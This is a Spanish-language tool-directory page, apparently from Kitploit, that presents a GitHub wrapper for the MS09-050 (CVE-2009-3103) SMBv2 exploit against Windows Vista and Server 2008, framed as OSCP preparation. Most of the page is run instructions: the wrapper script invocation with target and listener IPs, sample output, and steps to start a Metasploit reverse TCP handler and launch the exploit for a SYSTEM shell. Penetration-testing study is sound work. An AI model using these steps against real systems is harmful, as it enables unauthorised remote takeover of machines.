Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
ms09-050-CVE-2009-3103-exploit — Envoltorio automatizado de exploit para MS09-050 (CVE-2009-3103) dirigido a SMBv2 en Windows Vista/Server 2008. Genera shellcode, construye el exploit y crea un handler de Metasploit para acceso a shell como SYSTEM. | Kitploit
Herramientas/GitHubGitHub/nicolasdamians/ms09-050-cve-2009-3103-exploit
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónShellcodePruebas de PenetraciónAprendizaje y Educación
GitHubnicolasdamians/ms09-050-cve-2009-3103-exploit

ms09-050-CVE-2009-3103-exploit

Envoltorio automatizado de exploit para MS09-050 (CVE-2009-3103) dirigido a SMBv2 en Windows Vista/Server 2008. Genera shellcode, construye el exploit y crea un handler de Metasploit para acceso a shell como SYSTEM.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
hace 8 mesesAún no revisado

Contenedor de Exploit MS09-050 SMBv2

Configuración de una sola línea para la explotación de MS09-050 (CVE-2009-3103). Sin complicaciones, sin depuración, simplemente funciona.

¿Por qué?

La mayoría de los scripts de MS09-050 que circulan requieren inyección manual de shellcode, tienen problemas de sincronización con los handlers o simplemente no funcionan. Este contenedor:

  • Genera shellcode con los parámetros correctos
  • Construye el exploit automáticamente
  • Crea un handler de Metasploit listo para usar
  • Te dice exactamente qué ejecutar

Construido para la preparación del OSCP, donde el tiempo importa.

Objetivo

  • Vulnerabilidad: MS09-050 / CVE-2009-3103
  • Afectado: Windows Vista SP1/SP2, Windows Server 2008 (anterior a R2)
  • Servicio: SMBv2 en el puerto 445
  • Resultado: shell de SYSTEM

Requisitos

  • Kali Linux (o cualquier distribución con Metasploit)
  • msfvenom
  • msfconsole
  • python2
  • rpcclient (generalmente preinstalado)

Uso

root@kitploit:~
./ms09_050.sh <TARGET_IP> <YOUR_IP> [PORT]

Ejemplo

root@kitploit:~
./ms09_050.sh 192.168.233.40 192.168.45.232 443

Salida:

root@kitploit:~
[*] Target: 192.168.233.40 | LHOST: 192.168.45.232 | LPORT: 443
[*] Generating shellcode...
[+] Files created:
    - exploit.py
    - handler.rc

=== RUN ===

Terminal 1:  msfconsole -q -r handler.rc
Terminal 2:  python2 exploit.py 192.168.233.40

Ejecución

  1. Terminal 1 - Iniciar handler:

    root@kitploit:~
    msfconsole -q -r handler.rc
    

    Espera a: Started reverse TCP handler on ...

  2. Terminal 2 - Ejecutar exploit:

    root@kitploit:~
    python2 exploit.py 192.168.233.40
    
  3. Revisa la Terminal 1 para obtener tu shell.

Notas

  • Utiliza payload por etapas (windows/shell/reverse_tcp) - funciona de manera confiable con el stager en este exploit
  • Si el exploit falla, es posible que el objetivo necesite un reinicio o no sea vulnerable
  • Puerto 443 recomendado si 4444 está filtrado

Créditos

Exploit original basado en PoC de ohnozzy para MS09-050.

Licencia

MIT - Haz lo que quieras, solo no seas malvado.

Descargar herramienta